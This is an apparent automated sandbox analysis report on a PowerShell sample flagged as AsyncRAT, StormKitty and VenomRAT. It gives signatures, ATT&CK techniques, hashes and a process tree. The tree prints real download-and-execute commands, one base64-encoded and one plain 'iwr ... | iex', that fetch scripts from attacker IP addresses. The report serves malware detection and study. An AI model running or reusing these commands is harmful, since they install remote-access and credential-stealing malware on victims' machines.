asyncrat | 5605af6e3cba4057057a8cc765f94d1112d1a147171e056b1bdfcc3b38a056f0

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-01-2025 18:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2ps1.ps1
Size

164B
MD5

005b395fecc3e18d5bc9acb93bf96a4f
SHA1

34db5ff90015817fe8b2fe56ca241d6965ae95d4
SHA256

5605af6e3cba4057057a8cc765f94d1112d1a147171e056b1bdfcc3b38a056f0
SHA512

199d54c7cda83e493e611da4f063baec08cbc6606f8fcedce13dc2413d67133ab26d68045981006db2eb3b996513cac09654867eb3cf00eaaac0a947934e6ff8

Score

10^/10

asyncrat stormkitty venomrat discovery execution rat stealer

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/5012-74-0x0000000000400000-0x0000000000704000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

VenomRAT 1 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral2/memory/5012-74-0x0000000000400000-0x0000000000704000-memory.dmp	VenomRAT

Venomrat family
venomrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
8	3508	powershell.exe
10	3508	powershell.exe
19	1644	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2328	powershell.exe
3508	powershell.exe
1644	powershell.exe

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
512	Package.exe

Loads dropped DLL 1 IoCs

pid	Process
512	Package.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1644 set thread context of 5012	1644	powershell.exe	91

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1620	512	WerFault.exe	85

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Package.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
2328	powershell.exe
2328	powershell.exe
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe
1644	powershell.exe
1644	powershell.exe
5012	RegAsm.exe
5012	RegAsm.exe
5012	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	5012	RegAsm.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
512	Package.exe
512	Package.exe
512	Package.exe
5012	RegAsm.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2328 wrote to memory of 3508	2328	powershell.exe	83
PID 2328 wrote to memory of 3508	2328	powershell.exe	83
PID 3508 wrote to memory of 4388	3508	powershell.exe	84
PID 3508 wrote to memory of 4388	3508	powershell.exe	84
PID 4388 wrote to memory of 512	4388	cmd.exe	85
PID 4388 wrote to memory of 512	4388	cmd.exe	85
PID 4388 wrote to memory of 512	4388	cmd.exe	85
PID 512 wrote to memory of 2436	512	Package.exe	86
PID 512 wrote to memory of 2436	512	Package.exe	86
PID 512 wrote to memory of 2436	512	Package.exe	86
PID 2436 wrote to memory of 1644	2436	cmd.exe	88
PID 2436 wrote to memory of 1644	2436	cmd.exe	88
PID 2436 wrote to memory of 1644	2436	cmd.exe	88
PID 1644 wrote to memory of 2120	1644	powershell.exe	89
PID 1644 wrote to memory of 2120	1644	powershell.exe	89
PID 1644 wrote to memory of 2120	1644	powershell.exe	89
PID 2120 wrote to memory of 1240	2120	csc.exe	90
PID 2120 wrote to memory of 1240	2120	csc.exe	90
PID 2120 wrote to memory of 1240	2120	csc.exe	90
PID 1644 wrote to memory of 5012	1644	powershell.exe	91
PID 1644 wrote to memory of 5012	1644	powershell.exe	91
PID 1644 wrote to memory of 5012	1644	powershell.exe	91
PID 1644 wrote to memory of 5012	1644	powershell.exe	91
PID 1644 wrote to memory of 5012	1644	powershell.exe	91
PID 1644 wrote to memory of 5012	1644	powershell.exe	91
PID 1644 wrote to memory of 5012	1644	powershell.exe	91
PID 1644 wrote to memory of 5012	1644	powershell.exe	91

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\2ps1.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3508
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4388
  - - C:\Windows\Temp\Package.exe
      C:\Windows\Temp\Package.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:512
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2436
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1644
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nol0mtvd\nol0mtvd.cmdline"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2120
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES956A.tmp" "c:\Users\Admin\AppData\Local\Temp\nol0mtvd\CSCB8A261ADD68B448AA65115F47DBAC9A.TMP"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1240
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5012
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 196
        5⤵
        Program crash
        
        PID:1620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 512 -ip 512
1⤵
PID:4996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a6c9d692ed2826ecb12c09356e69cc09

SHA1
def728a6138cf083d8a7c61337f3c9dade41a37f

SHA256
a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

SHA512
2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES956A.tmp

Filesize
1KB

MD5
b32ca473ba0b778ec6f56ecf57f94718

SHA1
15cb5dde6f472a8cd536b25f03acd24a90e548c5

SHA256
70ebb4d29ed04ca826223eb7b36e670a02ceffec4ef6c9219d920f234dc8f361

SHA512
29697dd18e9cc41240bd102e5da9619d77880e13c4ce4e4dfa98ac57192cb70aa267d3adf7d9d03a906ebfd1069289458190184911d9030a5c97a094d1f34190

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qpweyox3.abv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nol0mtvd\nol0mtvd.dll

Filesize
9KB

MD5
977e121d6802e9ebd667857e19406184

SHA1
49799aa2d7c3e296c7aa2b0e59e936ef438b8192

SHA256
ee98693bf7254c88c8a12a61da56368a36233924091a21bdfc12f070e6e3f987

SHA512
3d489ee70d1fd6a9c924e059095397cb41394a9914f95e3a0b1307cc49c900235425a751d38c0b644caba2a77e0fa6dd3cc0064ae3e9830844ac8c9d943639ec

Download Submit
C:\Windows\Temp\IVIEWERS.DLL

Filesize
88KB

MD5
33ae2b9c3e710254fe2e2ce35ff8a7c8

SHA1
109e32187254b27e04ef18bbe1b48fad42bca841

SHA256
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68

SHA512
2abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599

Download Submit
C:\Windows\Temp\Package.exe

Filesize
201KB

MD5
2696d944ffbef69510b0c826446fd748

SHA1
e4106861076981799719876019fe5224eac2655c

SHA256
a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a

SHA512
c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nol0mtvd\CSCB8A261ADD68B448AA65115F47DBAC9A.TMP

Filesize
652B

MD5
cee7815e4ecce0039396880f9b056644

SHA1
bef335e88a3191430f081c24555c941636855a19

SHA256
b12e35512d1314c7dcfb9734f92f6582004dc6b9901afc057550ccc50dc2048a

SHA512
f0837e333feb7eb488272e0dbd12f9c590283d3ba65b1f9e835cb2c67902708125c559bd8b343a7a642798e8ffa203db5d66387b2cf0b254ac922111174a9591

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nol0mtvd\nol0mtvd.0.cs

Filesize
10KB

MD5
3fa79decff8805745cea8116d9bb2643

SHA1
92343c5fa2c768b964ae3a4e9136e5d7193e8558

SHA256
e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c

SHA512
5c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nol0mtvd\nol0mtvd.cmdline

Filesize
204B

MD5
a27fa56b9b880baf7b28689f0d0c1e36

SHA1
4b1e4679734a4b9567a1c64e53eb78da7607bf64

SHA256
62bb42f4970856bb8501eb57782833ef845c1b1105343205599170a72401da89

SHA512
5b754591da4a1cc5647f0bbe7c1d81636bfd3a2fba721c1cfc23d504ed4df1b5bca0c58afcc6dc27e876b1b81daae09ee106d0bb0d576f24904337d4756427a2

Download Submit
memory/1644-43-0x0000000005BE0000-0x0000000005C46000-memory.dmp

Filesize
408KB

Download
memory/1644-58-0x0000000006E80000-0x0000000006E9A000-memory.dmp

Filesize
104KB

Download
memory/1644-72-0x0000000007FA0000-0x0000000007FA8000-memory.dmp

Filesize
32KB

Download
memory/1644-59-0x0000000007F90000-0x0000000007F9E000-memory.dmp

Filesize
56KB

Download
memory/1644-39-0x00000000033A0000-0x00000000033D6000-memory.dmp

Filesize
216KB

Download
memory/1644-40-0x0000000005D70000-0x0000000006398000-memory.dmp

Filesize
6.2MB

Download
memory/1644-41-0x00000000059D0000-0x00000000059F2000-memory.dmp

Filesize
136KB

Download
memory/1644-42-0x0000000005B70000-0x0000000005BD6000-memory.dmp

Filesize
408KB

Download
memory/1644-57-0x0000000007FF0000-0x000000000866A000-memory.dmp

Filesize
6.5MB

Download
memory/1644-53-0x00000000063A0000-0x00000000066F4000-memory.dmp

Filesize
3.3MB

Download
memory/1644-55-0x0000000006970000-0x000000000698E000-memory.dmp

Filesize
120KB

Download
memory/1644-56-0x00000000069C0000-0x0000000006A0C000-memory.dmp

Filesize
304KB

Download
memory/2328-12-0x00007FF916680000-0x00007FF917141000-memory.dmp

Filesize
10.8MB

Download
memory/2328-36-0x00007FF916680000-0x00007FF917141000-memory.dmp

Filesize
10.8MB

Download
memory/2328-10-0x00000276EB310000-0x00000276EB332000-memory.dmp

Filesize
136KB

Download
memory/2328-0-0x00007FF916683000-0x00007FF916685000-memory.dmp

Filesize
8KB

Download
memory/2328-11-0x00007FF916680000-0x00007FF917141000-memory.dmp

Filesize
10.8MB

Download
memory/3508-14-0x00007FF916680000-0x00007FF917141000-memory.dmp

Filesize
10.8MB

Download
memory/3508-13-0x00007FF916680000-0x00007FF917141000-memory.dmp

Filesize
10.8MB

Download
memory/3508-24-0x00007FF916680000-0x00007FF917141000-memory.dmp

Filesize
10.8MB

Download
memory/3508-32-0x00007FF916680000-0x00007FF917141000-memory.dmp

Filesize
10.8MB

Download
memory/5012-74-0x0000000000400000-0x0000000000704000-memory.dmp

Filesize
3.0MB

Download
memory/5012-77-0x00000000057D0000-0x0000000005D74000-memory.dmp

Filesize
5.6MB

Download
memory/5012-78-0x00000000055D0000-0x0000000005662000-memory.dmp

Filesize
584KB

Download
memory/5012-79-0x0000000005590000-0x000000000559A000-memory.dmp

Filesize
40KB

Download
memory/5012-82-0x00000000064F0000-0x000000000658C000-memory.dmp

Filesize
624KB

Download
memory/5012-83-0x0000000006950000-0x0000000006CA4000-memory.dmp

Filesize
3.3MB

Download